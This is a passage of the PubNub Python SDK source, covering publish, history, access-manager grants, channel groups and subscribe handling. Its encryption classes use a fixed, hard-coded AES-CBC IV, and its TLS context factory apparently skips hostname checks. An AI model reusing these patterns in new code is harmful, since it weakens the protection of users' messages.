RedirectAgent, GzipDecoder from twisted.web.client import HTTPConnectionPool from twisted.web.http_headers import Headers from twisted.internet.ssl import ClientContextFactory import twisted pnconn_pool = HTTPConnectionPool(reactor, persistent=True) pnconn_pool.maxPersistentPerHost = 100000 pnconn_pool.cachedConnectionTimeout = 15 pnconn_pool.retryAutomatically = True class WebClientContextFactory(ClientContextFactory): def getContext(self, hostname, port): return ClientContextFactory.getContext(self) class PubNubPamResponse(Protocol): def __init__(self, finished): self.finished = finished def dataReceived(self, bytes): self.finished.callback(bytes) class PubNubResponse(Protocol): def __init__(self, finished): self.finished = finished def dataReceived(self, bytes): self.finished.callback(bytes) except ImportError: pass ####################################### def get_data_for_user(data): try: if 'message' in data and 'payload' in data: return {'message': data['message'], 'payload': data['payload']} else: return data except TypeError: return data class PubnubCrypto2(): def pad(self, msg, block_size=16): padding = block_size - (len(msg) % block_size) return msg + chr(padding) * padding def depad(self, msg): return msg[0:-ord(msg[-1])] def getSecret(self, key): return hashlib.sha256(key).hexdigest() def encrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) enc = encodestring(cipher.encrypt(self.pad(msg))) return enc def decrypt(self, key, msg): try: secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) plain = self.depad(cipher.decrypt(decodestring(msg))) except: return msg try: return json.loads(plain) except SyntaxError: return plain class PubnubCrypto3(): def pad(self, msg, block_size=16): padding = block_size - (len(msg) % block_size) return msg + (chr(padding) * padding).encode('utf-8') def depad(self, msg): return msg[0:-ord(msg[-1])] def getSecret(self, key): return hashlib.sha256(key.encode("utf-8")).hexdigest() def encrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) return encodestring( cipher.encrypt(self.pad(msg.encode('utf-8')))).decode('utf-8') def decrypt(self, key, msg): secret = self.getSecret(key) Initial16bytes = '0123456789012345' cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes) return (cipher.decrypt( decodestring(msg.encode('utf-8')))).decode('utf-8') class PubnubBase(object): def __init__( self, publish_key, subscribe_key, secret_key=False, cipher_key=False, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None ): """Pubnub Class Provides methods to communicate with Pubnub cloud Attributes: publish_key: Publish Key subscribe_key: Subscribe Key secret_key: Secret Key cipher_key: Cipher Key auth_key: Auth Key (used with Pubnub Access Manager i.e. PAM) ssl: SSL enabled ? origin: Origin """ self.origin = origin self.version = '3.7.3' self.limit = 1800 self.publish_key = publish_key self.subscribe_key = subscribe_key self.secret_key = secret_key self.cipher_key = cipher_key self.ssl = ssl_on self.auth_key = auth_key self.STATE = {} if self.ssl: self.origin = 'https://' + self.origin else: self.origin = 'http://' + self.origin self.uuid = uuid or str(uuid_lib.uuid4()) if type(sys.version_info) is tuple: self.python_version = 2 self.pc = PubnubCrypto2() else: if sys.version_info.major == 2: self.python_version = 2 self.pc = PubnubCrypto2() else: self.python_version = 3 self.pc = PubnubCrypto3() if not isinstance(self.uuid, str): raise AttributeError("uuid must be a string") def _pam_sign(self, msg): sign = urlsafe_b64encode(hmac.new( self.secret_key.encode("utf-8"), msg.encode("utf-8"), sha256 ).digest()) return quote(sign, safe="") def set_u(self, u=False): self.u = u def _pam_auth(self, query, apicode=0, callback=None, error=None): if 'timestamp' not in query: query['timestamp'] = int(time.time()) ## Global Grant? if 'auth' in query and not query['auth']: del query['auth'] if 'channel' in query and not query['channel']: del query['channel'] if 'channel-group' in query and not query['channel-group']: del query['channel-group'] params = "&".join([ x + "=" + quote( str(query[x]), safe="" ) for x in sorted(query) ]) sign_input = "{subkey}\n{pubkey}\n{apitype}\n{params}".format( subkey=self.subscribe_key, pubkey=self.publish_key, apitype="audit" if (apicode) else "grant", params=params ) query['signature'] = self._pam_sign(sign_input) return self._request({"urlcomponents": [ 'v1', 'auth', "audit" if (apicode) else "grant", 'sub-key', self.subscribe_key ], 'urlparams': query}, self._return_wrapped_callback(callback), self._return_wrapped_callback(error)) def get_origin(self): return self.origin def set_auth_key(self, auth_key): self.auth_key = auth_key def get_auth_key(self): return self.auth_key def grant(self, channel=None, channel_group=None, auth_key=False, read=False, write=False, manage=False, ttl=5, callback=None, error=None): """Method for granting permissions. This function establishes subscribe and/or write permissions for PubNub Access Manager (PAM) by setting the read or write attribute to true. A grant with read or write set to false (or not included) will revoke any previous grants with read or write set to true. Permissions can be applied to any one of three levels: 1. Application level privileges are based on subscribe_key applying to all associated channels. 2. Channel level privileges are based on a combination of subscribe_key and channel name. 3. User level privileges are based on the combination of subscribe_key, channel and auth_key. Args: channel: (string) (optional) Specifies channel name to grant permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channels simultaneously by specifying the channels as a comma separated list. channel_group: (string) (optional) Specifies channel group name to grant permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channel groups simultaneously by specifying the channel groups as a comma separated list. auth_key: (string) (optional) Specifies auth_key to grant permissions to. It is possible to specify multiple auth_keys as comma separated list in combination with a single channel name. If auth_key is provided as the special-case value "null" (or included in a comma-separated list, eg. "null,null,abc"), a new auth_key will be generated and returned for each "null" value. read: (boolean) (default: True) Read permissions are granted by setting to True. Read permissions are removed by setting to False. write: (boolean) (default: True) Write permissions are granted by setting to true. Write permissions are removed by setting to false. manage: (boolean) (default: True) Manage permissions are granted by setting to true. Manage permissions are removed by setting to false. ttl: (int) (default: 1440 i.e 24 hrs) Time in minutes for which granted permissions are valid. Max is 525600 , Min is 1. Setting ttl to 0 will apply the grant indefinitely. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response: { "message":"Success", "payload":{ "ttl":5, "auths":{ "my_ro_authkey":{"r":1,"w":0} }, "subscribe_key":"my_subkey", "level":"user", "channel":"my_channel" } } """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'r' : read and 1 or 0, 'w' : write and 1 or 0, 'm' : manage and 1 or 0, 'ttl' : ttl, 'pnsdk' : self.pnsdk }, callback=callback, error=error) def revoke(self, channel=None, channel_group=None, auth_key=None, ttl=1, callback=None, error=None): """Method for revoking permissions. Args: channel: (string) (optional) Specifies channel name to revoke permissions to. If channel/channel_group is not specified, the revoke applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to grant permissions to multiple channels simultaneously by specifying the channels as a comma separated list. channel_group: (string) (optional) Specifies channel group name to revoke permissions to. If channel/channel_group is not specified, the grant applies to all channels associated with the subscribe_key. If auth_key is not specified, it is possible to revoke permissions to multiple channel groups simultaneously by specifying the channel groups as a comma separated list. auth_key: (string) (optional) Specifies auth_key to revoke permissions to. It is possible to specify multiple auth_keys as comma separated list in combination with a single channel name. If auth_key is provided as the special-case value "null" (or included in a comma-separated list, eg. "null,null,abc"), a new auth_key will be generated and returned for each "null" value. ttl: (int) (default: 1440 i.e 24 hrs) Time in minutes for which granted permissions are valid. Max is 525600 , Min is 1. Setting ttl to 0 will apply the grant indefinitely. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response: { "message":"Success", "payload":{ "ttl":5, "auths":{ "my_authkey":{"r":0,"w":0} }, "subscribe_key":"my_subkey", "level":"user", "channel":"my_channel" } } """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'r' : 0, 'w' : 0, 'ttl' : ttl, 'pnsdk' : self.pnsdk }, callback=callback, error=error) def audit(self, channel=None, channel_group=None, auth_key=None, callback=None, error=None): """Method for fetching permissions from pubnub servers. This method provides a mechanism to reveal existing PubNub Access Manager attributes for any combination of subscribe_key, channel and auth_key. Args: channel: (string) (optional) Specifies channel name to return PAM attributes optionally in combination with auth_key. If channel/channel_group is not specified, results for all channels associated with subscribe_key are returned. If auth_key is not specified, it is possible to return results for a comma separated list of channels. channel_group: (string) (optional) Specifies channel group name to return PAM attributes optionally in combination with auth_key. If channel/channel_group is not specified, results for all channels associated with subscribe_key are returned. If auth_key is not specified, it is possible to return results for a comma separated list of channels. auth_key: (string) (optional) Specifies the auth_key to return PAM attributes for. If only a single channel is specified, it is possible to return results for a comma separated list of auth_keys. callback: (function) (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (function) (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a dict in sync mode i.e. when callback argument is not given The dict returned contains values with keys 'message' and 'payload' Sample Response { "message":"Success", "payload":{ "channels":{ "my_channel":{ "auths":{"my_ro_authkey":{"r":1,"w":0}, "my_rw_authkey":{"r":0,"w":1}, "my_admin_authkey":{"r":1,"w":1} } } }, } Usage: pubnub.audit ('my_channel'); # Sync Mode """ return self._pam_auth({ 'channel' : channel, 'channel-group' : channel_group, 'auth' : auth_key, 'pnsdk' : self.pnsdk }, 1, callback=callback, error=error) def encrypt(self, message): """Method for encrypting data. This method takes plaintext as input and returns encrypted data. This need not be called directly as enncryption/decryption is taken care of transparently by Pubnub class if cipher key is provided at time of initializing pubnub object Args: message: Message to be encrypted. Returns: Returns encrypted message if cipher key is set """ if self.cipher_key: message = json.dumps(self.pc.encrypt( self.cipher_key, json.dumps(message)).replace('\n', '')) else: message = json.dumps(message) return message def decrypt(self, message): """Method for decrypting data. This method takes ciphertext as input and returns decrypted data. This need not be called directly as enncryption/decryption is taken care of transparently by Pubnub class if cipher key is provided at time of initializing pubnub object Args: message: Message to be decrypted. Returns: Returns decrypted message if cipher key is set """ if self.cipher_key: message = self.pc.decrypt(self.cipher_key, message) return message def _return_wrapped_callback(self, callback=None): def _new_format_callback(response): if 'payload' in response: if (callback is not None): callback_data = dict() callback_data['payload'] = response['payload'] if 'message' in response: callback_data['message'] = response['message'] if (callback is not None): callback(callback_data) else: if (callback is not None): callback(response) if (callback is not None): return _new_format_callback else: return None def leave_channel(self, channel, callback=None, error=None): ## Send leave return self._request({"urlcomponents": [ 'v2', 'presence', 'sub_key', self.subscribe_key, 'channel', channel, 'leave' ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk, "uuid": self.uuid,}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def leave_group(self, channel_group, callback=None, error=None): ## Send leave return self._request({"urlcomponents": [ 'v2', 'presence', 'sub_key', self.subscribe_key, 'channel', ',', 'leave' ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk, 'channel-group' : channel_group, "uuid": self.uuid,}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def publish(self, channel, message, callback=None, error=None): """Publishes data on a channel. The publish() method is used to send a message to all subscribers of a channel. To publish a message you must first specify a valid publish_key at initialization. A successfully published message is replicated across the PubNub Real-Time Network and sent simultaneously to all subscribed clients on a channel. Messages in transit can be secured from potential eavesdroppers with SSL/TLS by setting ssl to True during initialization. Published messages can also be encrypted with AES-256 simply by specifying a cipher_key during initialization. Args: channel: (string) Specifies channel name to publish messages to. message: (string/int/double/dict/list) Message to be published callback: (optional) A callback method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado error: (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado Returns: Sync Mode : list Async Mode : None The function returns the following formatted response: [ Number, "Status", "Time Token"] The output below demonstrates the response to a successful call: [1,"Sent","13769558699541401"] """ message = self.encrypt(message) ## Send Message return self._request({"urlcomponents": [ 'publish', self.publish_key, self.subscribe_key, '0', channel, '0', message ], 'urlparams': {'auth': self.auth_key, 'pnsdk' : self.pnsdk}}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def presence(self, channel, callback, error=None, connect=None, disconnect=None, reconnect=None): """Subscribe to presence events on a channel. Only works in async mode Args: channel: Channel name ( string ) on which to listen for events callback: A callback method should be passed as parameter. If passed, the api works in async mode. Required argument when working with twisted or tornado . error: Optional variable. An error method can be passed as parameter. If set, the api works in async mode. Returns: None """ return self.subscribe(channel+'-pnpres', callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def presence_group(self, channel_group, callback, error=None, connect=None, disconnect=None, reconnect=None): """Subscribe to presence events on a channel group. Only works in async mode Args: channel_group: Channel group name ( string ) callback: A callback method should be passed to the method. If passed, the api works in async mode. Required argument when working with twisted or tornado . error: Optional variable. An error method can be passed as parameter. If passed, the api works in async mode. Returns: None """ return self.subscribe_group(channel_group+'-pnpres', callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def here_now(self, channel, uuids=True, state=False, callback=None, error=None): """Get here now data. You can obtain information about the current state of a channel including a list of unique user-ids currently subscribed to the channel and the total occupancy count of the channel by calling the here_now() function in your application. Args: channel: (string) (optional) Specifies the channel name to return occupancy results. If channel is not provided, here_now will return data for all channels. callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: list Async Mode: None Response Format: The here_now() method returns a list of uuid s currently subscribed to the channel. uuids:["String","String", ... ,"String"] - List of UUIDs currently subscribed to the channel. occupancy: Number - Total current occupancy of the channel. Example Response: { occupancy: 4, uuids: [ '123123234t234f34fq3dq', '143r34f34t34fq34q34q3', '23f34d3f4rq34r34rq23q', 'w34tcw45t45tcw435tww3', ] } """ urlcomponents = [ 'v2', 'presence', 'sub_key', self.subscribe_key ] if (channel is not None and len(channel) > 0): urlcomponents.append('channel') urlcomponents.append(channel) data = {'auth': self.auth_key, 'pnsdk' : self.pnsdk} if state is True: data['state'] = '1' if uuids is False: data['disable_uuids'] = '1' ## Get Presence Here Now return self._request({"urlcomponents": urlcomponents, 'urlparams': data}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def history(self, channel, count=100, reverse=False, start=None, end=None, include_token=False, callback=None, error=None): """This method fetches historical messages of a channel. PubNub Storage/Playback Service provides real-time access to an unlimited history for all messages published to PubNub. Stored messages are replicated across multiple availability zones in several geographical data center locations. Stored messages can be encrypted with AES-256 message encryption ensuring that they are not readable while stored on PubNub's network. It is possible to control how messages are returned and in what order, for example you can: Return messages in the order newest to oldest (default behavior). Return messages in the order oldest to newest by setting reverse to true. Page through results by providing a start or end time token. Retrieve a "slice" of the time line by providing both a start and end time token. Limit the number of messages to a specific quantity using the count parameter. Args: channel: (string) Specifies channel to return history messages from count: (int) (default: 100) Specifies the number of historical messages to return callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a list in sync mode i.e. when callback argument is not given Sample Response: [["Pub1","Pub2","Pub3","Pub4","Pub5"],13406746729185766,13406746845892666] """ def _get_decrypted_history(resp): try: if resp is not None and isinstance(resp, (list)) and resp[1] is not None and self.cipher_key: msgs = resp[0] for i in range(0,len(msgs)): msgs[i] = self.decrypt(msgs[i]) except KeyError: pass return resp def _history_callback(resp): if callback is not None: callback(_get_decrypted_history(resp)) if callback is None: history_cb = None else: history_cb = _history_callback params = dict() params['count'] = count params['reverse'] = reverse params['start'] = start params['end'] = end params['auth'] = self.auth_key params['pnsdk'] = self.pnsdk params['include_token'] = 'true' if include_token else 'false' ## Get History return _get_decrypted_history(self._request({'urlcomponents': [ 'v2', 'history', 'sub-key', self.subscribe_key, 'channel', channel, ], 'urlparams': params}, callback=self._return_wrapped_callback(history_cb), error=self._return_wrapped_callback(error))) def time(self, callback=None): """This function will return a 17 digit precision Unix epoch. Args: callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Returns a 17 digit number in sync mode i.e. when callback argument is not given Sample: 13769501243685161 """ time = self._request({'urlcomponents': [ 'time', '0' ]}, callback) if time is not None: return time[0] def _encode(self, request): return [ "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and hex(ord(ch)).replace('0x', '%').upper() or ch for ch in list(bit) ]) for bit in request] def getUrl(self, request): if self.u is True and "urlparams" in request: request['urlparams']['u'] = str(random.randint(1, 100000000000)) ## Build URL url = self.origin + '/' + "/".join([ "".join([' ~`!@#$%^&*()+=[]\\{}|;\':",./<>?'.find(ch) > -1 and hex(ord(ch)).replace('0x', '%').upper() or ch for ch in list(bit) ]) for bit in request["urlcomponents"]]) if ("urlparams" in request): url = url + '?' + "&".join([x + "=" + str(y) for x, y in request[ "urlparams"].items() if y is not None and len(str(y)) > 0]) #print(url) return url def _channel_registry(self, url=None, params=None, callback=None, error=None): if (params is None): params = dict() urlcomponents = ['v1', 'channel-registration', 'sub-key', self.subscribe_key ] if (url is not None): urlcomponents += url params['auth'] = self.auth_key params['pnsdk'] = self.pnsdk ## Get History return self._request({'urlcomponents': urlcomponents, 'urlparams': params}, callback=self._return_wrapped_callback(callback), error=self._return_wrapped_callback(error)) def _channel_group(self, channel_group=None, channels=None, cloak=None,mode='add', callback=None, error=None): params = dict() url = [] namespace = None if (channel_group is not None and len(channel_group) > 0): ns_ch_a = channel_group.split(':') if len(ns_ch_a) > 1: namespace = None if ns_ch_a[0] == '*' else ns_ch_a[0] channel_group = ns_ch_a[1] else: channel_group = ns_ch_a[0] if (namespace is not None): url.append('namespace') url.append(self._encode(namespace)) url.append('channel-group') if channel_group is not None and channel_group != '*': url.append(channel_group) if (channels is not None): if (type(channels) is list): channels = ','.join(channels) params[mode] = channels #params['cloak'] = 'true' if CLOAK is True else 'false' else: if mode == 'remove': url.append('remove') return self._channel_registry(url=url, params=params, callback=callback, error=error) def channel_group_list_namespaces(self, callback=None, error=None): """Get list of namespaces. You can obtain list of namespaces for the subscribe key associated with PubNub object using this method. Args: callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_list_namespaces method returns a dict which contains list of namespaces in payload field { u'status': 200, u'payload': { u'sub_key': u'demo', u'namespaces': [u'dev', u'foo'] }, u'service': u'channel-registry', u'error': False } Async Mode: None (callback gets the response as parameter) Response Format: The callback passed to channel_group_list_namespaces gets the a dict containing list of namespaces under payload field { u'payload': { u'sub_key': u'demo', u'namespaces': [u'dev', u'foo'] } } namespaces is the list of namespaces for the given subscribe key """ url = ['namespace'] return self._channel_registry(url=url, callback=callback, error=error) def channel_group_remove_namespace(self, namespace, callback=None, error=None): """Remove a namespace. A namespace can be deleted using this method. Args: namespace: (string) namespace to be deleted callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: dict channel_group_remove_namespace method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_namespaces gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ url = ['namespace', self._encode(namespace), 'remove'] return self._channel_registry(url=url, callback=callback, error=error) def channel_group_list_groups(self, namespace=None, callback=None, error=None): """Get list of groups. Using this method, list of groups for the subscribe key associated with PubNub object, can be obtained. If namespace is provided, groups within the namespace only are listed Args: namespace: (string) (optional) namespace callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: dict channel_group_list_groups method returns a dict which contains list of groups in payload field { u'status': 200, u'payload': {"namespace": "dev", "groups": ["abcd"]}, u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_namespaces gets the a dict containing list of groups under payload field { u'payload': {"namespace": "dev", "groups": ["abcd"]} } """ if (namespace is not None and len(namespace) > 0): channel_group = namespace + ':*' else: channel_group = '*:*' return self._channel_group(channel_group=channel_group, callback=callback, error=error) def channel_group_list_channels(self, channel_group, callback=None, error=None): """Get list of channels for a group. Using this method, list of channels for a group, can be obtained. Args: channel_group: (string) (optional) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_list_channels method returns a dict which contains list of channels in payload field { u'status': 200, u'payload': {"channels": ["hi"], "group": "abcd"}, u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_list_channels gets the a dict containing list of channels under payload field { u'payload': {"channels": ["hi"], "group": "abcd"} } """ return self._channel_group(channel_group=channel_group, callback=callback, error=error) def channel_group_add_channel(self, channel_group, channel, callback=None, error=None): """Add a channel to group. A channel can be added to group using this method. Args: channel_group: (string) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group channel: (string) Can be a channel name, a list of channel names, or a comma separated list of channel names callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_add_channel method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_add_channel gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, channels=channel, mode='add', callback=callback, error=error) def channel_group_remove_channel(self, channel_group, channel, callback=None, error=None): """Remove channel. A channel can be removed from a group method. Args: channel_group: (string) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group channel: (string) Can be a channel name, a list of channel names, or a comma separated list of channel names callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado . Returns: Sync Mode: dict channel_group_remove_channel method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_remove_channel gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, channels=channel, mode='remove', callback=callback, error=error) def channel_group_remove_group(self, channel_group, callback=None, error=None): """Remove channel group. A channel group can be removed using this method. Args: channel_group: (string) Channel Group name. It can also contain namespace. If namespace is also specified, then the parameter will be in format namespace:channel_group callback: (optional) A callback method should be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. error: (optional) Optional variable. An error method can be passed to the method. If set, the api works in async mode. Required argument when working with twisted or tornado. Returns: Sync Mode: dict channel_group_remove_group method returns a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } Async Mode: None ( callback gets the response as parameter ) Response Format: The callback passed to channel_group_remove_group gets the a dict indicating status of the request { u'status': 200, u'message': 'OK', u'service': u'channel-registry', u'error': False } """ return self._channel_group(channel_group=channel_group, mode='remove', callback=callback, error=error) class EmptyLock(): def __enter__(self): pass def __exit__(self, a, b, c): pass empty_lock = EmptyLock() class PubnubCoreAsync(PubnubBase): def start(self): pass def stop(self): pass def __init__( self, publish_key, subscribe_key, secret_key=None, cipher_key=None, auth_key=None, ssl_on=False, origin='pubsub.pubnub.com', uuid=None, _tt_lock=empty_lock, _channel_list_lock=empty_lock, _channel_group_list_lock=empty_lock ): super(PubnubCoreAsync, self).__init__( publish_key=publish_key, subscribe_key=subscribe_key, secret_key=secret_key, cipher_key=cipher_key, auth_key=auth_key, ssl_on=ssl_on, origin=origin, uuid=uuid ) self.subscriptions = {} self.subscription_groups = {} self.timetoken = 0 self.last_timetoken = 0 self.accept_encoding = 'gzip' self.SUB_RECEIVER = None self._connect = None self._tt_lock = _tt_lock self._channel_list_lock = _channel_list_lock self._channel_group_list_lock = _channel_group_list_lock self._connect = lambda: None self.u = None def get_channel_list(self, channels): channel = '' first = True with self._channel_list_lock: for ch in channels: if not channels[ch]['subscribed']: continue if not first: channel += ',' else: first = False channel += ch return channel def get_channel_group_list(self, channel_groups): channel_group = '' first = True with self._channel_group_list_lock: for ch in channel_groups: if not channel_groups[ch]['subscribed']: continue if not first: channel_group += ',' else: first = False channel_group += ch return channel_group def get_channel_array(self): """Get List of currently subscribed channels Returns: Returns a list containing names of channels subscribed Sample return value: ["a","b","c] """ channels = self.subscriptions channel = [] with self._channel_list_lock: for ch in channels: if not channels[ch]['subscribed']: continue channel.append(ch) return channel def get_channel_group_array(self): """Get List of currently subscribed channel groups Returns: Returns a list containing names of channel groups subscribed Sample return value: ["a","b","c] """ channel_groups = self.subscription_groups channel_group = [] with self._channel_group_list_lock: for ch in channel_groups: if not channel_groups[ch]['subscribed']: continue channel_group.append(ch) return channel_group def each(l, func): if func is None: return for i in l: func(i) def subscribe(self, channels, callback, state=None, error=None, connect=None, disconnect=None, reconnect=None, presence=None, sync=False): """Subscribe to data on a channel. This function causes the client to create an open TCP socket to the PubNub Real-Time Network and begin listening for messages on a specified channel. To subscribe to a channel the client must send the appropriate subscribe_key at initialization. Only works in async mode Args: channel: (string/list) Specifies the channel to subscribe to. It is possible to specify multiple channels as a comma separated list or andarray. callback: (function) This callback is called on receiving a message from the channel. state: (dict) State to be set. error: (function) (optional) This callback is called on an error event connect: (function) (optional) This callback is called on a successful connection to the PubNub cloud disconnect: (function) (optional) This callback is called on client disconnect from the PubNub cloud reconnect: (function) (optional) This callback is called on successfully re-connecting to the PubNub cloud Returns: None """ return self._subscribe(channels=channels, callback=callback, state=state, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect, presence=presence) def subscribe_group(self, channel_groups, callback, error=None, connect=None, disconnect=None, reconnect=None, sync=False): """Subscribe to data on a channel group. This function causes the client to create an open TCP socket to the PubNub Real-Time Network and begin listening for messages on a specified channel. To subscribe to a channel group the client must send the appropriate subscribe_key at initialization. Only works in async mode Args: channel_groups: (string/list) Specifies the channel groups to subscribe to. It is possible to specify multiple channel groups as a comma separated list or andarray. callback: (function) This callback is called on receiving a message from the channel. error: (function) (optional) This callback is called on an error event connect: (function) (optional) This callback is called on a successful connection to the PubNub cloud disconnect: (function) (optional) This callback is called on client disconnect from the PubNub cloud reconnect: (function) (optional) This callback is called on successfully re-connecting to the PubNub cloud Returns: None """ return self._subscribe(channel_groups=channel_groups, callback=callback, error=error, connect=connect, disconnect=disconnect, reconnect=reconnect) def _subscribe(self, channels=None, channel_groups=None, state=None, callback=None, error=None, connect=None, disconnect=None, reconnect=None, presence=None): with self._tt_lock: self.last_timetoken = self.timetoken if self.timetoken != 0 \ else self.last_timetoken self.timetoken = 0 def _invoke(func, msg=None, channel=None, real_channel=None): if func is not None: if msg is not None and channel is not None and real_channel is not None: try: func(get_data_for_user(msg), channel, real_channel) except: func(get_data_for_user(msg), channel) elif msg is not None and channel is not None: func(get_data_for_user(msg), channel) elif msg is not None: func(get_data_for_user(msg)) else: func() def _invoke_connect(): if self._channel_list_lock: with self._channel_list_lock: x = copy.copy(self.subscriptions) for ch in x: chobj = x[ch] if chobj['connected'] is False: chobj['connected'] = True chobj['disconnected'] = False _invoke(chobj['connect'], chobj['name']) else: if chobj['disconnected'] is True: chobj['disconnected'] = False _invoke(chobj['reconnect'], chobj['name']) if self._channel_group_list_lock: with self._channel_group_list_lock: for ch in self.subscription_groups: chobj = self.subscription_groups[ch] if chobj['connected'] is False: chobj['connected'] = True chobj['disconnected'] = False _invoke(chobj['connect'], chobj['name']) else: if chobj['disconnected'] is True: chobj['disconnected'] = False _invoke(chobj['reconnect'], chobj['name']) def _invoke_disconnect(): if self._channel_list_lock: with self._channel_list_lock: for ch in self.subscriptions: chobj = self.subscriptions[ch] if chobj['connected'] is True: if chobj['disconnected'] is False: chobj['disconnected'] = True _invoke(chobj['disconnect'], chobj['name']) if self._channel_group_list_lock: with self._channel_group_list_lock: for ch in self.subscription_groups: chobj = self.subscription_groups[ch] if chobj['connected'] is True: if chobj['disconnected'] is False: chobj['disconnected'] = True _invoke(chobj['disconnect'], chobj['name']) def _invoke_error(channel_list=None, error=None): if channel_list is None: for ch in self.subscriptions: chobj = self.subscriptions[ch] try: _invoke(chobj['error'], error, ch) except TypeError: _invoke(chobj['error'], error) else: for ch in channel_list: chobj = self.subscriptions[ch] try: _invoke(chobj['error'], error, ch) except TypeError: _invoke(chobj['error'], error) def _get_channel(): for ch in self.subscriptions: chobj = self.subscriptions[ch] if chobj['subscribed'] is True: return chobj if channels is not None: channels = channels if isinstance( channels, list) else channels.split(",") for channel in channels: ## New Channel? if len(channel) > 0 and \ (not channel in self.subscriptions or self.subscriptions[channel]['subscribed'] is False): with self._channel_list_lock: self.subscriptions[channel] = { 'name': channel, 'first': False, 'connected': False, 'disconnected': True, 